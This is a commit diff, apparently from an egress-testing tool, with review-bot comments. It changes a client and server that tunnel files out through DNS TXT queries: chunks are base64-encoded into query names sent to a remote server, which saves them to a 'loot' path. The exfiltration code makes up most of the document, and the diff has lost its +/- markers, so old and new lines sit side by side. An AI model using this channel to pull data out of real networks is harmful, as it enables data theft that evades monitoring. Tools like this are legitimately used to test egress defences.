added check to make sure slide is or is not already in file dictionary

resolved_file
Christopher Truncer 2015-05-27 09:56:36 -04:00
parent 1cd4d30b99
commit 7b1638fd88
2 changed files with 32 additions and 30 deletions


@ -20,28 +20,17 @@ class Client:
self.protocol = "dns_resolved"
self.remote_server = cli_object.ip
self.max_length = 68
self.current_total = 0
if cli_object.file is None:
self.file_transfer = False
self.length = 50
else:
self.length = 30
self.length = 24
if "/" in cli_object.file:
self.file_transfer = cli_object.file.split("/")[-1]
else:
self.file_transfer = cli_object.file
def dns_encode(outgoing_data):
# This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform
for i in range(0, len(outgoing_data), 0xff+1):
outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:]
return outgoing_data
def randomKey(b=20):
"""
Returns a random string/key of "b" characters in length, defaults to 32
"""
return ''.join(random.choice(string.ascii_letters + string.digits) for x in range(b))
def transmit(self, data_to_transmit):
byte_reader = 0
@ -78,22 +67,34 @@ class Client:
encoded_data = base64.b64encode(str(packet_number) + ".:|:." + data_to_transmit[byte_reader:byte_reader + self.length])
encoded_data = encoded_data + "." + self.remote_server
# calcalate total packets
if (((len(data_to_transmit) - byte_reader) % self.length) == 0):
packet_diff = (len(data_to_transmit) - byte_reader) / self.length
else:
packet_diff = ((len(data_to_transmit) - byte_reader) / self.length)
while len(encoded_data) > self.max_length:
self.length -= 1
# calcalate total packets
if (((len(data_to_transmit) - byte_reader) % self.length) == 0):
packet_diff = (len(data_to_transmit) - byte_reader) / self.length
packet_diff2 = (len(data_to_transmit) - byte_reader) / self.length
else:
packet_diff = ((len(data_to_transmit) - byte_reader) / self.length)
packet_diff2 = ((len(data_to_transmit) - byte_reader) / self.length)
check_total = True
encoded_data = base64.b64encode(str(packet_number) + ".:|:." + data_to_transmit[byte_reader:byte_reader + self.length])
encoded_data = encoded_data + "." + self.remote_server
if check_total:
self.current_total = packet_number + packet_diff
self.current_total = packet_number + packet_diff2
check_total = False
else:
if self.current_total == 0:
self.current_total = packet_diff
else:
pass
print "[*] Packet Number/Total Packets: " + str(packet_number) + "/" + str(self.current_total)
# Craft the packet with scapy
@ -103,10 +104,10 @@ class Client:
if '=' in encoded_data:
encoded_data = encoded_data.replace('=', '-pqp-')
response_packet = sr1(IP(dst=nameserver)/UDP()/DNS(
response_packet = sr1(IP(dst=nameserver, ttl=10)/UDP()/DNS(
rd=1, id=15, opcode=0,
qd=[DNSQR(qname=encoded_data, qtype="TXT")], aa=1, qr=0),
verbose=False, timeout=2)
verbose=False, timeout=8)
if response_packet:
if response_packet.haslayer(DNSRR):
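Review bot: Both branches of the remainder test in the transmit hunk compute the same value, so the total printed in the "Packet Number/Total Packets" line is one short whenever the remaining data is not an exact multiple of self.length. The else branch should round up, e.g. `packet_diff2 = ((len(data_to_transmit) - byte_reader) / self.length) + 1`, and likewise for `packet_diff`. The page has lost its +/- markers, so which of the paired lines is the new side is inferred. The `while len(encoded_data) > self.max_length` loop also lowers self.length with no lower bound, so a long enough remote_server value would bring it to zero and the following `% self.length` would raise ZeroDivisionError; a guard such as `if self.length <= 0: raise ValueError("remote server name leaves no room for data")` would fail clearly instead. transmit's body starts and ends outside these hunks.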


@ -16,7 +16,6 @@ class Server:
def __init__(self, cli_object):
self.protocol = "dns_resolved"
self.last_packet = ''
self.file_name = ''
self.loot_path = ''
self.file_dict = {}
@ -42,24 +41,26 @@ class Server:
incoming_data = base64.b64decode(string_to_decode)
if ".:|:." in incoming_data:
self.file_status = incoming_data.split('.:|:.')[0]
file_data = incoming_data.split('.:|:.')[1]
self.file_dict[self.file_status] = file_data
if self.file_status in self.file_dict:
pass
else:
file_data = incoming_data.split('.:|:.')[1]
self.file_dict[self.file_status] = file_data
outgoing_data = self.file_status + "allgoodhere"
outgoing_data = self.file_status + "allgoodhere"
# This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform
for i in range(0, len(outgoing_data), 0xff+1):
outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:]
# This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform
for i in range(0, len(outgoing_data), 0xff+1):
outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:]
send(IP(dst=packet[IP].src)/UDP(dport=packet[UDP].sport, sport=53)/DNS(rd=1, id=packet[DNS].id, qr=1,
qd=[DNSQR(qname=dnsqr_strings.split('\'')[1].rstrip('.'), qtype=packet[DNSQR].qtype)],
an=[DNSRR(rrname=dnsqr_strings.split('\'')[1].rstrip('.'), rdata=outgoing_data, type=packet[DNSQR].qtype)]),
verbose=False)
send(IP(dst=packet[IP].src)/UDP(dport=packet[UDP].sport, sport=53)/DNS(rd=1, id=packet[DNS].id, qr=1,
qd=[DNSQR(qname=dnsqr_strings.split('\'')[1].rstrip('.'), qtype=packet[DNSQR].qtype)],
an=[DNSRR(rrname=dnsqr_strings.split('\'')[1].rstrip('.'), rdata=outgoing_data, type=packet[DNSQR].qtype)]),
verbose=False)
else:
with open(self.loot_path + self.file_name, 'a') as dns_out:
dns_out.write(encoded_data)
self.last_packet = encoded_data
except TypeError:
pass
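Review bot: The new duplicate check stores `incoming_data.split('.:|:.')[1]`, which silently drops everything after a second `.:|:.` when the transferred chunk itself contains the separator, so the reassembled file can come out truncated. Splitting once keeps the payload intact: `self.file_status, file_data = incoming_data.split('.:|:.', 1)`. The `if self.file_status in self.file_dict: pass` / `else:` form reads more directly as `if self.file_status not in self.file_dict:`. A one-line comment saying that the first copy of a sequence number wins and later copies are ignored would document the intent of the check. The enclosing method starts outside the hunk.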